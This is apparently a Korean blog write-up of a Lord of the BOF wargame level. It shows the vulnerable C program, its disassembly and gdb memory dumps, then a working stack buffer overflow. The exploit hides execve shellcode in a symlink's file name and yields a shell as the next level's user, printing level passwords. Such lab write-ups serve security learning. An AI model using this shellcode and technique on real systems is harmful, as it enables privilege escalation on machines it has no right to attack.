728x90
반응형
1. intro
2. code 및 분석
2.1 C code
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i, saved_argc;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc;
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}
2.3. 분석
2.3.1. assembler code (중요 부분)
앞과 동일하지만, 추가된 부분은 아래와 같디 argv 모두를 초기화 한다는 점이다.
0x8048623 <main+291>: mov 0xffffffd4(%ebp),%eax
0x8048626 <main+294>: cmp 0xffffffd0(%ebp),%eax
0x8048629 <main+297>: jl 0x8048630 <main+304>
0x804862b <main+299>: jmp 0x8048670 <main+368>
0x804862d <main+301>: lea 0x0(%esi),%esi
0x8048630 <main+304>: mov 0xffffffd4(%ebp),%eax
0x8048633 <main+307>: lea 0x0(,%eax,4),%edx
0x804863a <main+314>: mov 0xc(%ebp),%eax
0x804863d <main+317>: mov (%eax,%edx,1),%edx
0x8048640 <main+320>: push %edx
0x8048641 <main+321>: call 0x80483f0 <strlen>
0x8048646 <main+326>: add $0x4,%esp
0x8048649 <main+329>: mov %eax,%eax
0x804864b <main+331>: push %eax
0x804864c <main+332>: push $0x0
0x804864e <main+334>: mov 0xffffffd4(%ebp),%eax
0x8048651 <main+337>: lea 0x0(,%eax,4),%edx
0x8048658 <main+344>: mov 0xc(%ebp),%eax
0x804865b <main+347>: mov (%eax,%edx,1),%edx
0x804865e <main+350>: push %edx
0x804865f <main+351>: call 0x8048430 <memset>
0x8048664 <main+356>: add $0xc,%esp
0x8048667 <main+359>: incl 0xffffffd4(%ebp)
0x804866a <main+362>: jmp 0x8048623 <main+291>
0x804866c <main+364>: lea 0x0(%esi,1),%esi
3. 취약점 확인 및 공격 준비
3.1 취약점
취약점은 동일하다.
3.2 공격 준비
환경변수 영역 및 stack 모두 초기화해버리기에 더 이상 값을 쓸 곳이 없어 보이지만,
가장 마지막 부분으로 가보면 어떤 값이 들어있다.
0xbfffffb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd8: 0x00000000 0x00000000 0x00000000 0x6f682f00
0xbfffffe8: 0x762f656d 0x69706d61 0x732f6572 0x656c656b
0xbffffff8: 0x00616f74 0x00000000 Cannot access memory at address 0xc0000000이를 출력해보면 파일명 임을 알 수 있다.
그럼 심볼릭 링크를 통해 변경된 파일명이 삽입되는지 확인해보자.
[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100'`
[vampire@localhost vampire]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA skeleton
skeletoa skeleton.c
[vampire@localhost vampire]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb) b *main+368
(gdb) r `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
Starting program: /home/vampire/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
/bin/bash2: /home/troll/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Breakpoint 1, 0x8048670 in main ()
(gdb) x/40x 0xbfffff00
0xbfffff00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff80: 0x00000000 0x00000000 0x6f682f00 0x762f656d
0xbfffff90: 0x69706d61 0x412f6572 0x41414141 0x41414141
(gdb)
0xbfffffa0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffff0: 0x41414141 0x41414141 0x00414141 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
4. exploit
위를 토대로 파일 명을 셀코드로 사용하여 공격해보면 아래와 같다.
[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
skeletoa
skeleton
skeleton.c
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) groups=509(vampire)
bash$ my-pass
euid = 509
music world
bash$ exit
exit
[vampire@localhost vampire]$ rm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀
[vampire@localhost vampire]$ ln -s skeleton `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder728x90
반응형
'Wargame > Hackerchool' 카테고리의 다른 글
| [lob] golem -> darkknight (0) | 2022.09.15 |
|---|---|
| [lob] skeleton -> golem (0) | 2022.09.14 |
| [lob] troll -> vampire (0) | 2022.09.13 |
| [lob] orge -> trol (0) | 2022.09.13 |
| [lob] darkelf -> orge (0) | 2022.09.13 |